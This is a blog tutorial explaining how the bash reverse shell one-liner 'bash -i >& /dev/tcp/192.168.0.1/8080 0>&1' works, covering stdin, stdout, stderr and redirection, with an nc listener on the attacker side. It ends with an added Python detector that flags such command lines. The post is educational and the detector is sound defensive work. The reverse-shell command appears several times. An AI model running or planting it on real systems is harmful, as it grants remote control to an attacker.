
The commands of reverse shell

April 18, 2023 • 常山


I read an answer about Linux commands on Zhihu, which details stdin, stdout, stderr and redirection. When I finished reading, I found that I could not understand the meaning of the Linux command in the reverse shell. So I am writing this article.

I introduced the reverse shell before. At that time, I had just started learning hacking, so in that article I only briefly introduced the shell, but with further study, I think it's necessary to look at the reverse shell again.

We can get a reverse shell with bash -i >& /dev/tcp/192.168.0.1/8080 0>&1; this command makes the shell appear on port 8080 of 192.168.0.1. But why? This article tries to answer that.

Everything is a file

The reverse shell embodies the concept that everything is a file. /dev/tcp is a special file: through it, we can send requests to a specified IP/domain and port. The file isn't real; bash interprets the path itself when it appears in a redirection, and opening it establishes a socket connection. So /dev/tcp/192.168.0.1/8080 means this host establishes a socket connection to port 8080 of 192.168.0.1. The connection is established, but why do the commands show up on the screen of 192.168.0.1?

Stdin, stdout and stderr

stdin, stdout and stderr are all file descriptors. In Linux, stdin is number zero, stdout is number one, and stderr is number two. When a shell starts on Linux, these three file descriptors are already open. We give stdin through the keyboard and see stdout/stderr on the display. Usually stdout and stderr are shown on the display, but if they are to go to a file or another device, we need to use redirection.

Redirection

Redirection is a concept in the shell. Through redirection, input can be taken from, and output can be sent to, a file or another device. In the shell, < and << are called input redirection. > and >> are called output redirection.

Input redirection

command 0< file means that file becomes the standard input of command. The zero can be omitted.


Output redirection

command 1> file means that we redirect the output of command to file. This number can also be omitted.


We can also redirect stderr to the same place as stdout, such as command > file 2>&1 or command >& file. Redirections are applied from left to right, so 2>&1 must come after > file.

Reverse shell

bash -i creates an interactive shell. When we run nc -lvp 8080 on the attack VPS and run bash -i >& /dev/tcp/192.168.0.1/8080 0>&1 on the attacked VPS, commands typed on the attack VPS are executed on the attacked VPS. At the same time, the results from the attacked VPS are displayed on the attack VPS.

bash -i >& /dev/tcp/192.168.0.1/8080 0>&1 can also be written as bash -i > /dev/tcp/192.168.0.1/8080 0>&1 2>&1. The stdout of the interactive shell on the attacked VPS is redirected to the socket connected to port 8080 of 192.168.0.1. 0>&1 makes stdin a copy of stdout, so the shell reads its input from the same socket, which is whatever is typed on the attack VPS. 2>&1 sends the errors of the attacked VPS to port 8080 of 192.168.0.1 as well.

This is the reverse shell.
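
A defender's view of the same file-descriptor logic, as an added example that is not part of the original article: the Python code below resolves a command line's redirections from left to right and flags a process whose stdin and stdout both end up on a /dev/tcp or /dev/udp path. The function names and the sample command lines are constructed for illustration; 192.168.0.1 and port 8080 are the values used in the article.

```python
import re
import shlex

# Redirections covered in the article: N>file, N>>file, N<file, >&file, N>&M
REDIR = re.compile(r"^(\d*)(>&|&>|>>|<>|<&|>|<)(.*)$")
NET = re.compile(r"^/dev/(tcp|udp)/[^/]+/\d+$")  # bash network pseudo-file

def resolve_fds(cmdline):
    """Apply redirections left to right; return what fds 0, 1, 2 point at."""
    fds = {0: "tty", 1: "tty", 2: "tty"}
    tokens = shlex.split(cmdline)
    i = 0
    while i < len(tokens):
        m = REDIR.match(tokens[i])
        i += 1
        if not m:
            continue  # ordinary word, not a redirection
        num, op, target = m.groups()
        if target == "" and i < len(tokens):  # "> file" written with a space
            target = tokens[i]
            i += 1
        if op in (">&", "<&") and target.isdigit():
            # N>&M: fd N becomes a copy of whatever fd M points at right now
            fd = int(num) if num else (1 if op == ">&" else 0)
            fds[fd] = fds.get(int(target), "closed")
        elif op in (">&", "&>") and num == "":
            fds[1] = fds[2] = target  # >&file sends stdout and stderr to file
        else:
            default = 0 if op.startswith("<") else 1
            fds[int(num) if num else default] = target
    return {n: fds[n] for n in (0, 1, 2)}

def shell_io_on_socket(cmdline):
    """True when stdin and stdout both resolve to a /dev/tcp or /dev/udp path."""
    fds = resolve_fds(cmdline)
    return bool(NET.match(fds[0]) and NET.match(fds[1]))

# Constructed sample command lines, e.g. as seen in process audit logs
SAMPLES = [
    "bash -i >& /dev/tcp/192.168.0.1/8080 0>&1",
    "bash -i > /dev/tcp/192.168.0.1/8080 0>&1 2>&1",
    "bash -c 'make all' > /tmp/build.log 2>&1",
    "echo ping > /dev/tcp/192.168.0.1/8080",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print("ALERT" if shell_io_on_socket(line) else "ok   ", line)
```

Both spellings from the article resolve to the same descriptor table, which is why the check works on the resolved descriptors and not on the literal string.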
